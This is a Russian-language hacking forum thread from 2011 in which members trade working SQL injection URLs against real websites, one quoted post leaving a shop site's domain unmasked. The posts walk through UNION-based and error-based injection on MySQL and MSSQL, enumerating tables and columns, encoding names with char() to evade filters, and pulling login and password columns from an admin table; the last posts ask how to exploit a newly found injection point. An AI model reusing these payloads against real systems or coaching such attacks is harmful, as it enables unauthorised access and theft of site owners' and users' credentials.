Старый 23.09.2011, 23:21   #1321
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от trashmail Посмотреть сообщение
Круто, спасибо. Хотел бы узнать почему не выводилось обычным способом.
http://www.***.org/vernoticia.php?codigo=10471+and+1=0+union+select+1 ,unhex(hex(table_name)),3,4,5+from+information_sch ema.tables+--+
обычным тоже пашет

Последний раз редактировалось Twost; 17.05.2013 в 13:28..
vp$ вне форума   Ответить с цитированием
Старый 23.09.2011, 23:45   #1322
winner13
 
Регистрация: 17.09.2011
Сообщений: 4
Репутация: 0
По умолчанию

Цитата:
Сообщение от vp$ Посмотреть сообщение
http://www.***.com/shop/voucher_list.asp?Id=1+or+1=@@version--

это mssql
Всё равно что то не выводит http://www.***.com/shop/voucher_list.asp?Id=1+or+1=2+union+select+1,2,3,4, 5,6,7,8-- (Вроде пробелов нету, сохраняю пробел появляется)

По шпаргалке вроде всё делал, и так как знаю пробывал.

Последний раз редактировалось Twost; 17.05.2013 в 13:28..
winner13 вне форума   Ответить с цитированием
Старый 23.09.2011, 23:59   #1323
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от winner13 Посмотреть сообщение
Всё равно что то не выводит http://www.london-travelcards.com/shop/voucher_list.asp?Id=1+or+1=2+union+select+1,2,3,4, 5,6,7,8-- (Вроде пробелов нету, сохраняю пробел появляется)

По шпаргалке вроде всё делал, и так как знаю пробывал.

http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(select(max(table_name) )from[information_schema].tables)--

http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(SELECT%20DB_NAME())--
http://www.***.com/shop/voucher_list.asp?Id=1+or+1=(SELECT%20HOST_NAME())--

Последний раз редактировалось Twost; 17.05.2013 в 13:29..
vp$ вне форума   Ответить с цитированием
Старый 24.09.2011, 13:45   #1324
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

На этом сайте есть таблица gcc_Admin

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,table_name,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,null+from+informatio n_schema.tables--

Как вывести колонки через information_schema.columns, менял gcc_Admin на зачаренное – не проходит?

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,column_name,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null+from+informati on_schema.columns+where+table_name=char(103)%2Bcha r(99)%2Bchar(99)%2Bchar(95)%2Bchar(65)%2Bchar(100) %2Bchar(109)%2Bchar(105)%2Bchar(110)--

Последний раз редактировалось Twost; 17.05.2013 в 13:29..
Flakt вне форума   Ответить с цитированием
Старый 24.09.2011, 17:18   #1325
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
На этом сайте есть таблица gcc_Admin

Как вывести колонки через information_schema.columns, менял gcc_Admin на зачаренное – не проходит?
Login,PW

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,Login,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null+from+gcc_Admin--

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,PW,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null+from+gcc_Admin--

Последний раз редактировалось Twost; 17.05.2013 в 13:29..
Tim вне форума   Ответить с цитированием
Старый 24.09.2011, 17:41   #1326
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от Tim Посмотреть сообщение
Login,PW

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,Login,null,null,null, null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null+from+gcc_Admin--

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,PW,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null+from+gcc_Admin--
Спасибо, и не достающая информация

http://www.***.com/shop/voucher_list.asp?Id=-1+union+all+select+null,null,table_name,null,null, null,null,null,null,null,null,null,null,null,colum n_name,null,null,null,null,null,null,null+from+inf ormation_schema.columns--

Последний раз редактировалось Twost; 17.05.2013 в 13:29..
Flakt вне форума   Ответить с цитированием
Старый 24.09.2011, 20:01   #1327
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

в сайте комментарию новости..в комменте напишу ' или 'test' вылазит ошибка
Цитата:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0')' at line 1
что ето ?
salut вне форума   Ответить с цитированием
Старый 24.09.2011, 20:08   #1328
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от salut Посмотреть сообщение
в сайте комментарию новости..в комменте напишу ' или 'test' вылазит ошибка

что ето ?
Это, скуля, но это не значит, что ее на 100% удастся раскрутить.
Flakt вне форума   Ответить с цитированием
Старый 25.09.2011, 14:19   #1329
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

а вот именно интересно как раскрутить..
salut вне форума   Ответить с цитированием
Старый 25.09.2011, 14:21   #1330
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

Цитата:
Сообщение от salut Посмотреть сообщение
а вот именно интересно как раскрутить..
Мы не экстрасенсы, сайт в студию!
Flakt вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot